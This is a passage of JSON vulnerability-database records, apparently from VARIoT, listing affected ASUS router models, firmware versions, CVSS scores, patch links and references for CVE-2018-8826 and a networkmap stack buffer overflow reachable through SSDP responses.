computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac52u b1", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac55u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.382.50276" }, { "model": "rt-ac55uhp", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.382.50276" }, { "model": "rt-ac58u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac66u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac86u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.384.20648" }, { "model": "rt-acrh13", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-n12 d1", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-n600", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac1750", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-n12 d1", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-acrh13", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac66u", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac58u", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac51u", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac52u b1", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac1200", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-n600", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac55u", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.382.50276" }, { "model": "rt-ac55uhp", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.382.50276" }, { "model": "rt-ac2900", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.384.20648" }, { "model": "rt-ac86u", "scope": "lt", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.384.20648" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac1200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac1750_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac51u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac52u_b1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac55u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac55uhp_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac58u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-acrh13_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n12_d1_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n600_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-004414" } ] }, "cve": "CVE-2018-8826", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-8826", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2018-09806", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-138858", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-8826", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-8826", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-8826", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2018-09806", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201804-1316", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-138858", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)", "sources": [ { "db": "NVD", "id": "CVE-2018-8826" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-8826", "trust": 3.1 }, { "db": "JVNDB", "id": "JVNDB-2018-004414", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201804-1316", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2018-09806", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-138858", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "id": "VAR-201804-1564", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" } ], "trust": 1.3063388469230768 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" } ] }, "last_update_date": "2024-11-23T22:41:51.846000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "RT-AC55U", "trust": 0.8, "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "title": "RT-AC1200", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "title": "RT-AC55UHP", "trust": 0.8, "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" }, { "title": "RT-AC1750", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "title": "RT-AC66U", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "title": "RT-AC86U", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "title": "RT-ACRH13", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" }, { "title": "RT-N600", "trust": 0.8, "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "title": "RT-N12_D1", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "title": "RT-AC2900", "trust": 0.8, "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "title": "RT-N66W", "trust": 0.8, "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "title": "RT-AC52U-B1", "trust": 0.8, "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "title": "RT-AC51U", "trust": 0.8, "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "title": "RT-AC58U", "trust": 0.8, "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "title": "Patches for arbitrary code execution vulnerabilities for multiple ASUS products", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/129599" }, { "title": "Multiple ASUS Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79610" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-138858" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.asus.com/networking/rt-ac2900/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/networking/rt-ac52u-b1/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/ca-en/networking/rt-n600/helpdesk_download/" }, { "trust": 1.7, "url": "https://www.asus.com/sg/networking/rt-ac58u/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rt-ac1200/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rt-ac1750/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rt-ac86u/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rt-acrh13/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rtac66u/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rtn12_d1/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/networking/rtn66w/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/supportonly/rt-ac51u/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/supportonly/rt-ac55u/helpdesk_bios/" }, { "trust": 1.7, "url": "https://www.asus.com/us/supportonly/rt-ac55uhp/helpdesk_bios/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8826" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8826" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2018-09806" }, { "db": "VULHUB", "id": "VHN-138858" }, { "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "db": "NVD", "id": "CVE-2018-8826" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-18T00:00:00", "db": "CNVD", "id": "CNVD-2018-09806" }, { "date": "2018-04-20T00:00:00", "db": "VULHUB", "id": "VHN-138858" }, { "date": "2018-06-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "date": "2018-04-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "date": "2018-04-20T20:29:00.583000", "db": "NVD", "id": "CVE-2018-8826" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-18T00:00:00", "db": "CNVD", "id": "CNVD-2018-09806" }, { "date": "2018-05-24T00:00:00", "db": "VULHUB", "id": "VHN-138858" }, { "date": "2018-06-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-004414" }, { "date": "2018-04-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201804-1316" }, { "date": "2024-11-21T04:14:23.937000", "db": "NVD", "id": "CVE-2018-8826" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201804-1316" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS Vulnerability related to input validation in router product firmware", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-004414" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-201804-1316" } ], "trust": 0.6 } }
var-201707-0400
Vulnerability from variot
Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201707-0400", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac88u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac52u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.4180" }, { "model": "rt-ac66u b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt ac1900p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac51u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac1200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-n12hp", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.2943" }, { "model": "rt-n12hp b1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt-ac3100", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt n12\\+ pro", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9880" }, { "model": "rt-ac55u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac58u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7485" }, { "model": "rt-n16", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-ac53", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.9883" }, { "model": "rt-ac68u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n18u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac5300", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n66u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3167" }, { "model": "rt ac1200gu", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.5577" }, { "model": "rt-n56u", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.378.7177" }, { "model": "rt-ac68p", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-ac3200", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7743" }, { "model": "rt-n12d1", "scope": "lte", "trust": 1.0, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt ac1200g", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.8, "vendor": "asuswrt merlin", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "1.0.1.4" }, { "model": "rt-ac5300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1900p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac52u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac51u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200gu", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt ac1200g", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac1200", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac53", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12d1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12+", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt n12+ pro", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n300", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac55u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac56u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac58u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u b1", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac68p", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n12hp b1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.3479" }, { "model": "rt-n12d1", "scope": "eq", "trust": 0.6, "vendor": "asuswrt merlin", "version": "3.0.0.4.380.7378" }, { "model": "rt-n12\\+", "scope": "eq", "trust": 0.6, "vendor": "asuswrt 